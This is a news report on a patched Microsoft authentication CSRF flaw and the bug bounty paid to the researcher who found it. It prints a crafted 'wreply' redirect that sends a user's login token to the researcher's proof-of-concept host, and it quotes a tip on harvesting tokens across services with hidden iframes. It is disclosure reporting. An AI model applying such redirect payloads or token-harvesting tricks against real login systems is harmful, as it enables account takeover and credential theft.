A security researcher has won $13,000 bounty from Microsoft for finding a critical flaw in its main authentication system that could allow hackers to gain access to a user's Outlook, Azure and Office accounts.
The vulnerability has been uncovered by UK-based security consultant Jack Whitton and is similar to Microsoft's OAuth CSRF (Cross-Site Request Forgery) in Live.com discovered by Synack security researcher Wesley Wineberg.
However, the main and only difference between the vulnerabilities is that: Flaw discovered by Wineberg affected Microsoft's OAuth protection mechanism while the one discovered by Whitton affected Microsoft's main authentication system.
Microsoft handles authentication across its online services including Outlook, Azure and Office through requests made to login.live.com, login.windows.net, and login.microsoftonline.com.
Now, for example, if a user browses to outlook.office.com, he/she redirects to a login.microsoftonline.com URL that contains 'wreply' parameter for specifying which domain the user wants to access.
How Does the Vulnerability Work?
If the particular user is already logged in, a POST request is made back to the domain specified in wreply with a value containing a login token for the user. The service the user wants to authenticate on consumes that token and logs the user in.
Whitton discovered that the authentication URL is vulnerable to cross-site request forgery (CSRF) attacks, allowing a malicious actor to create a specially crafted URL, which, when accessed by an authenticated user, would send the login token to a server controlled by the attacker.
The legitimate URL looks like this:
https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563
And the attacker could set the redirect to this:
https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f
The expert found that this would cause the login token to be sent to the attacker’s website, which in this case is poc-ssl.fin1te.net. Using the token, the attacker could have gained complete access to the targeted user’s account.
"The token is only valid for the service that issued it – an Outlook token can not be used for Azure, for example," Whitton noted in his blog post. "But it would be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way."
The good news is that Microsoft patched the vulnerability within two days after Whitton reported it to the company on January 24. The company also paid out $13,000 to the researcher as part of its bug bounty program.